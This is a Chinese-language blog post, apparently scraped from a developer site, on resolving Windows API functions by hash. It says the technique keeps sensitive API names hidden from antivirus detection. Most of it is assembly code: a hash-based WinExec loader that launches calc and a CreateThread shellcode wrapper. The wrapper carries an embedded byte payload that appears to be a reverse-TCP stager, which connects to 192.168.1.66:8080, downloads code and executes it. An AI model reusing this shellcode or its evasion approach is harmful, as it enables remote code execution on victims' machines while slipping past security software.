hash算法搜索获得api函数地址的实现,"kernel32.dll", "CreateThread"
我们一般要获得一个函数的地址,通常采用的是明文,例如定义一个api函数字符串"MessageBoxA",然后在GetProcAddress函数中一个字节一个字节进行比较。这样弊端很多,例如如果我们定义一个杀毒软件比较敏感的api函数字符串,那么可能就会增加杀毒软件对我们的程序的判定值,而且定义这些字符串还有一个弊端是占用的字节数较大。我们想想如何我们的api函数字符串通过算法将它定义成一个4字节的值,然后在GetProcAddress中把AddressOfNames表中的每个地址指向的api字符串通过我们的算法压缩成4字节值后,与我们之前定义的4字节值进行判断,如果匹配成功则读取函数地址。
我们来看一种rol 3移位算法,这个算法是每次将目的地址循环向左移动3位,然后将低字节与源字符串的每个字节进行异或。算法很精巧方便。还有很多方便小巧的算法,例如ROR 13等算法,其实它和我们上面的基本一样,只不过它将函数名表的字符串通过我们的算法过程获得hash值后与我们之前定义的hash值进行匹配,匹配成功则获得对应函数的地址。
下面的代码通过hash搜索WinExec函数来运行Clac:
.
.model flat, stdcall
option casemap:none include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib .const
szCalc db 'calc.exe', .code _GetKrnl32 proc ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 获取kernel32.dll的地址,因为xp和win7不一样
; 故采用比较名称的方式获取地址,具体见Kernel32基地址获得学习
; http://blog.csdn.net/programmingring/article/details/11357393
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
assume fs:nothing
mov eax, fs:[30h]
mov eax, [eax + 0ch]
mov eax, [eax + 1ch] ; 第一个LDR_MODULE ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 压入kernel32.dll的unicode字符串
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
push dword ptr 006ch
push dword ptr 6c0064h
push dword ptr 2e0032h
push dword ptr 33006ch
push dword ptr 65006eh
push dword ptr 720065h
push word ptr 006bh
mov ebx, esp ; ebx指向字符串 ;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 开始比较
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_Search:
cmp eax,
jz _NotFound
cmp eax, 0ffffffffh
jz _NotFound
lea esi, [eax + 1ch] ; esi指向UNICODE_STRING结构
xor ecx, ecx
mov cx, ; 比较的长度
mov esi, [esi + ] ; 获得UNICODE_STRING结构的Buffer成员
mov edi, ebx ; edi指向kernel32unicode字符串
repz cmpsw
or ecx, ecx ; ecx减完说明相等
jz _Found
mov eax, [eax] ; 获取下一个LDR_MODULE
jmp _Search _NotFound:
mov eax, 0ffffffffh
jmp _Over _Found:
mov eax, [eax + 08h] ; 获得地址 _Over:
add esp,
ret _GetKrnl32 endp _GetRolHash proc _lpApiString mov eax, _lpApiString
push esi
xor edx, edx
xchg eax, esi ; esi = _lpApiString
cld ; 递增 _Next:
lodsb ; 从esi指向的地址中取一个字符
test al, al ; 比较是否为0
jz _Ret
rol edx, ; 左循环移位3位
xor dl, al ; 低字节和字符异或
jmp _Next _Ret:
xchg eax, edx ; eax = 处理后的_lpApiString的hash
pop esi
ret _GetRolHash endp _GetApi proc _hDllHandle, _iHashApi push ebp
mov eax, _hDllHandle
mov ecx, _iHashApi
mov ebx, eax
mov edi, ecx mov eax, [ebx + 3ch]
mov esi, [ebx + eax + 78h] ; Get Export RVA
lea esi, [esi + ebx + IMAGE_EXPORT_DIRECTORY.NumberOfNames]
lodsd
xchg eax, edx ; edx = NumberOfNames
lodsd
push eax ; [esp] = AddressOfFunctions
lodsd
xchg eax, ebp ; ebp = AddressOfNames
lodsd
xchg eax, ebp ; ebp = AddressOfNameOrdinals, eax = AddressOfNames
add eax, ebx
xchg eax, esi ; esi = AddressOfNames _LoopScas:
dec edx
js _Ret
lodsd ; eax = api名称的rva
add eax, ebx ; eax = api名称的实际地址
push edx
invoke _GetRolHash, eax ; 计算hash字符串 pop edx
cmp eax, edi ; 比较和传入的hash参数是否相等
jz _GetAddr add ebp, ; 递增,和esi相对应
jmp _LoopScas _GetAddr:
movzx eax, word ptr [ebp + ebx] ; 取得序号值
shl eax, ; 乘4
add eax, [esp] ; 在AddressOfFunctions取得相应序号值位置的值
mov eax, [ebx + eax] ; 取得函数地址
add eax, ebx _Ret:
pop ecx
pop ebp
ret _GetApi endp _WinMain proc invoke _GetKrnl32
invoke _GetApi, eax, 016ef74bh ; "WinExec"的hash
push SW_SHOW
lea ebx, szCalc
push ebx
call eax
ret _WinMain endp start:
call _WinMain
invoke ExitProcess, end start
另外一段代码:新建一个线程的shellcode,payload: 后面的内容为要新建线程要执行的内容。
[BITS 32]
[ORG 0]
cld
call start
delta:
%include "block_api.asm"
start:
pop ebp ; pop off the address of 'api_call' for calling later.
xor eax, eax
push eax
push eax
push eax
lea ebx, [ebp+threadstart-delta]
push ebx
push eax
push eax
push 0x160D6838 ; hash( "kernel32.dll", "CreateThread" )
call ebp ; CreateThread( NULL, 0, &threadstart, NULL, 0, NULL );
jmp end
threadstart:
pop eax ; pop off the unused thread param so the prepended shellcode can just return when done.
payload: db 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x6a,0x05,0x68,0xc0,0xa8,0x01,0x42,0x68,0x02,0x00,0x1f,0x90,0x89,0xe6,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x61,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0x36,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7d,0x22,0x58,0x68,0x00,0x40,0x00,0x00,0x6a,0x00,0x50,0x68,0x0b,0x2f,0x0f,0x30,0xff,0xd5,0x57,0x68,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x5e,0x5e,0xff,0x0c,0x24,0xe9,0x71,0xff,0xff,0xff,0x01,0xc3,0x29,0xc6,0x75,0xc7,0xc3,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5
end
上面代码里block_api.asm
api_call:
pushad ; We preserve all the registers for the caller, bar EAX and ECX.
mov ebp, esp ; Create a new stack frame
xor eax, eax ; Zero EAX (upper 3 bytes will remain zero until function is found)
mov edx, [fs:eax+48] ; Get a pointer to the PEB
mov edx, [edx+12] ; Get PEB->Ldr
mov edx, [edx+20] ; Get the first module from the InMemoryOrder module list
next_mod: ;
mov esi, [edx+40] ; Get pointer to modules name (unicode string)
movzx ecx, word [edx+38] ; Set ECX to the length we want to check
xor edi, edi ; Clear EDI which will store the hash of the module name
loop_modname: ;
lodsb ; Read in the next byte of the name
cmp al, 'a' ; Some versions of Windows use lower case module names
jl not_lowercase ;
sub al, 0x20 ; If so normalise to uppercase
not_lowercase: ;
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
loop loop_modname ; Loop until we have read enough ; We now have the module hash computed
push edx ; Save the current position in the module list for later
push edi ; Save the current module hash for later
; Proceed to iterate the export address table,
mov edx, [edx+16] ; Get this modules base address
mov ecx, [edx+60] ; Get PE header ; use ecx as our EAT pointer here so we can take advantage of jecxz.
mov ecx, [ecx+edx+120] ; Get the EAT from the PE header
jecxz get_next_mod1 ; If no EAT present, process the next module
add ecx, edx ; Add the modules base address
push ecx ; Save the current modules EAT
mov ebx, [ecx+32] ; Get the rva of the function names
add ebx, edx ; Add the modules base address
mov ecx, [ecx+24] ; Get the number of function names
; now ecx returns to its regularly scheduled counter duties ; Computing the module hash + function hash
get_next_func: ;
jecxz get_next_mod ; When we reach the start of the EAT (we search backwards), process the next module
dec ecx ; Decrement the function name counter
mov esi, [ebx+ecx*4] ; Get rva of next module name
add esi, edx ; Add the modules base address
xor edi, edi ; Clear EDI which will store the hash of the function name
; And compare it to the one we want
loop_funcname: ;
lodsb ; Read in the next byte of the ASCII function name
ror edi, 13 ; Rotate right our hash value
add edi, eax ; Add the next byte of the name
cmp al, ah ; Compare AL (the next byte from the name) to AH (null)
jne loop_funcname ; If we have not reached the null terminator, continue
add edi, [ebp-8] ; Add the current module hash to the function hash
cmp edi, [ebp+36] ; Compare the hash to the one we are searching for
jnz get_next_func ; Go compute the next function hash if we have not found it ; If found, fix up stack, call the function and then value else compute the next one...
pop eax ; Restore the current modules EAT
mov ebx, [eax+36] ; Get the ordinal table rva
add ebx, edx ; Add the modules base address
mov cx, [ebx+2*ecx] ; Get the desired functions ordinal
mov ebx, [eax+28] ; Get the function addresses table rva
add ebx, edx ; Add the modules base address
mov eax, [ebx+4*ecx] ; Get the desired functions RVA
add eax, edx ; Add the modules base address to get the functions actual VA
; We now fix up the stack and perform the call to the desired function...
finish:
mov [esp+36], eax ; Overwrite the old EAX value with the desired api address for the upcoming popad
pop ebx ; Clear off the current modules hash
pop ebx ; Clear off the current position in the module list
popad ; Restore all of the callers registers, bar EAX, ECX and EDX which are clobbered
pop ecx ; Pop off the origional return address our caller will have pushed
pop edx ; Pop off the hash value our caller will have pushed
push ecx ; Push back the correct return value
jmp eax ; Jump into the required function
; We now automagically return to the correct caller... get_next_mod: ;
pop edi ; Pop off the current (now the previous) modules EAT
get_next_mod1: ;
pop edi ; Pop off the current (now the previous) modules hash
pop edx ; Restore our position in the module list
mov edx, [edx] ; Get the next module
jmp short next_mod ; Process this module
hash算法搜索获得api函数地址的实现,"kernel32.dll", "CreateThread"的更多相关文章
- 逐步实现hash算法(基于BKDRhash函数)
哈希(Hash)算法,即散列函数.它是一种单向密码体制,即它是一个从明文到密文的不可逆的映射,只有加密过程,没有解密过程.同时,哈希函数可以将任意长度的输入经过变化以后得到固定长度的输出.hash算法 ...
- hash算法
作者:July.wuliming.pkuoliver 说明:本文分为三部分内容, 第一部分为一道百度面试题Top K算法的详解:第二部分为关于Hash表算法的详细阐述:第三部分为打造一个最快的Hash ...
- Hash算法的讲解
散列表,又叫哈希表,它是基于快速存取的角度设计的,也是一种典型的“空间换时间”的做法.顾名思义,该数据结构可以理解为一个线性表,但是其中的元素不是紧密排列的,而是可能存在空隙. 散列表(Hash ta ...
- 旧书重温:0day2【4】动态获取函数地址
通过以上3篇文章的学习,我们已经可以获取到kernel32.dll的地址了下一步 我们就是获取几个重要的函数 1.GetProcAddress 2.LoadLibrary 有了这两个函数很多函数都可以 ...
- advapi32.dll kernel32.dll 中的两套注册表API
日前遇到一件事:WebBrowser中的网页会用到一个“大众”ActiveX控件,为了保证兼容性以及和其它程序互不干扰,我们采用这样一种方案: 1. 我们的软件会自带该控件: 2. 如果系统中已注册有 ...
- HASH、HASH函数、HASH算法的通俗理解
之前经常遇到hash函数或者经常用到hash函数,但是hash到底是什么?或者hash函数到底是什么?却很少去考虑.最近同学去面试被问到这个问题,自己看文章也看到hash的问题.遂较为细致的追究了一番 ...
- hash算法和常见的hash函数 [转]
Hash,就是把任意长度的输入,通过散列算法,变换成固定长度的输出,该输出就是散列值. 这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能 会散列成相同的输出,而不 ...
- [区块链] 密码学中Hash算法(基础)
在介绍Hash算法之前,先给大家来个数据结构中对hash表(散列表)的简单解释,然后我再逐步深入,讲解一下hash算法. 一.Hash原理——基础篇 1.1 概念 哈希表就是一种以 键-值(key-i ...
- Hash算法入门指南(聊点不一样的算法人生)
前言 很多人到现在为止都总是问我算法该怎么学啊,数据结构好难啊怎么的,学习难度被莫名的夸大了,其实不然.对于一个学计算机相关专业的人都知道,数据结构是大学的一门必修课,数据结构与算法是基础,却常常容易 ...
随机推荐
- 【操作系统、UNIX环境编程】进程间通信
多个进程可以共享系统中的各种资源,但其中许多资源一次只能为一个进程使用,我们把一次仅允许一个进程使用的资源称为临界资源,许多物理设备都属于临界资源,如打印机等. Linux下进程间通信有如下几种方式: ...
- BZOJ 2957 楼房重建(线段树区间合并)
一个显而易见的结论是,这种数字的值是单调递增的.我们修改一个数只会对这个数后面的数造成影响.考虑线段树划分出来的若干线段. 这里有两种情况: 1.某个线段中的最大值小于等于修改的数,那么这个线段的贡献 ...
- bzoj2699 更新
题意 对于一个数列A[1..N],一种寻找最大值的方法是:依次枚举A[2]到A[N],如果A[i]比当前的A[1]值要大,那么就令A[1]=A[i],最后A[1]为所求最大值.假设所有数都在范围[1, ...
- Frequent values UVA - 11235(巧妙地RMQ)
题意: 给出一个非降序排列的整数数组a1.a2,······,an,你的任务是对于一系列询问(i,j),回答ai,ai+1,······,aj中出现次数最多的值所出现的次数 解析: 白书p198 其实 ...
- Doves and bombs UVA - 10765(统计割顶所连接的连通块的数量)
题意:给定一个n个点的连通的无向图,一个点的“鸽子值”定义为将它从图中删去后连通块的个数. 求对应的点 和 每个点的“鸽子值” 用一个数组在判断割顶的那个地方 累加标记一下所连接的连通块的数量即可 初 ...
- Docker学习笔记五:Docker生成jenkins容器,支持Java Web项目持续集成、持续部署
一.创建jenkins容器: 1.拉取jeknin镜像 sudo docker pull jenkins 2.创建一个jenkins目录 sudo mkdir /jenkins 3.在jenkins目 ...
- 基于数组实现Java 自定义Stack栈类及应用
栈是存放对象的一种特殊容器,在插入与删除对象时,这种结构遵循后进先出( Last-in-first-out,LIFO)的原则.java本身是有自带Stack类包,为了达到学习目的已经更好深入了解sta ...
- BZOJ5315 [JSOI2018]防御网络 【仙人掌 + dp】
题目链接 BZOJ5315 题解 题目好吓人= =点仙人掌 + 斯坦纳树 我们只需求出对于所有选点的方案的斯坦纳树边长总和 \(n\)那么大当然不能状压,但是考虑一下如果这是一棵树,一个方案的贡献就是 ...
- 安装svn测试环境
centos 6.5 web service模式 安装svn测试服务器 1 下载subversion shell>yum install subversion 2 查看安装的版本 [root@c ...
- Java Socket TCP编程(Server端多线程处理)
package com; import java.io.*; import java.net.Socket; /** * Socket Client * <p> * Created by ...